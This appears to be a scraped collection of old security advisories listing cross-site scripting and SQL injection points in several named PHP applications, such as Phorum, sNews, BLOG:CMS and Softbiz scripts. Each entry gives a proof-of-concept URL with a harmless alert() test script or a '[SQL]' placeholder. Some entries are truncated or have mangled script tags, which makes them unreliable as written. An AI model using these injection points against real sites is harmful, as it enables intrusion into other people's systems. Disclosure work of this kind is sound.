GeoClassifieds Enterprise = 2.0.5.2 Cross Site Scripting

GeoClassifieds Enterprise 2.0.5.2 http://geodesicsolutions.com/products/classifieds/classifieds_enterprise.htm -- Cross Site Scripting (XSS) -- POST http://target.xx:80/index.php?a=10 HTTP/1.0 Host: target.xx Content-Type:

Phpprobid = 5.24 XSS SQL injection Vulnerability

Phpprobid 5.24 http://www.phpprobid.com -- Cross Site Scripting (XSS) -- http://target.xx/auctionsearch.php?advsrc=;scriptalert(/EllipsisSecurityTest/)/script

MusicBox = 2.3.4 XSS SQL injection Vulnerability

MusicBox 2.3.4 http://www.musicboxv2.com PHPinfo page /phpinfo.php -- Cross Site Scripting (XSS) -- http://www.target.xx/?id=scriptalert(/EllipsisSecurityTest/)/scriptpage=0

Phorum 5.1.14 XSS SQL injection Vulnerability

Phorum 5.1.14 http://www.phorum.org -- Cross Site Scripting (XSS) -- POST http://target.xx:80/posting.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 447

sNews 1.3 XSS SQL

sNews 1.3 http://snews.solucija.com -- Cross Site Scripting (XSS) -- POST http://target.xx:80/index.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 88

BLOG:CMS 4.1.0 SQL injection File Include Vulnerability

BLOG:CMS 4.1.0 http://blogcms.com - SQL injection - http://target.xx/?1'[SQL] http://target.xx/?item='[SQL] http://target.xx/?blog='[SQL] http://target.xx/?member='[SQL] http://target.xx/?typeface=1'[SQL] http://target.xx/?results='[SQL]

QTOFileManager 1.0

-- Cross Site Scripting (XSS) -- http://target.xx/qtofm.php?delete=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3Eu=[username]pathext=1

TBE 4.0 XSS

The Banner Engine - tbe4.0 Native Solutions -- Cross Site Scripting (XSS) -- http://target.xx/top.php?action=searchcatid=catidtext=%3Cscript%3Ealert(%22Ellipsis+Security+Test%22)%3C/script%3E

NewsPHP 2006 PRO XSS SQL injection Vulnerability

http://newsphp.com -- Cross Site Scripting (XSS) -- http://target.xx/?words=%3Cscript%3Ealert(/Ellipsis%20Security%20Test/)%3C/script%3Ewhere=1 http://target.xx/index.php?id=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E

Softbiz Banner Exchange 1.0 XSS

Softbiz Banner Exchange Network 1.0 http://softbizscripts.com -- Cross Site Scripting (XSS) -- POST http://target.xx:80/insertmember.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 152

Softbiz Dating 1.0 SQL injection

Softbiz Dating 1.0 http://www.softbizscripts.com - - SQL injection - http://target.xx/search_results.php?country=1[SQL] http://target.xx/search_results.php?pg=2sort_by=1[SQL] http://target.xx/featured_photos.php?browse=1[SQL]

aeDating 4.1 XSS

Product of AEwebworks Dating Software http://www.aewebworks.com/ --- Cross Site Scripting (XSS) --- http://target.xx:80/index.php?Sex=;scriptalert(/Elipsis+Security+Test/)/scriptMode=last ^G4 Template work^ --- POST /join_form.php HTTP/1.1

Dating Agent PRO 4.7.1 Vulnerability

Dating Agent PRO 4.7.1 http://www.datetopia.com/datingagent/ -- - PHPinfo page /requirements.php - SQL injection - http://target.xx/picture.php?pid=1[SQL] http://target.xx/mem.php?mid=1[SQL]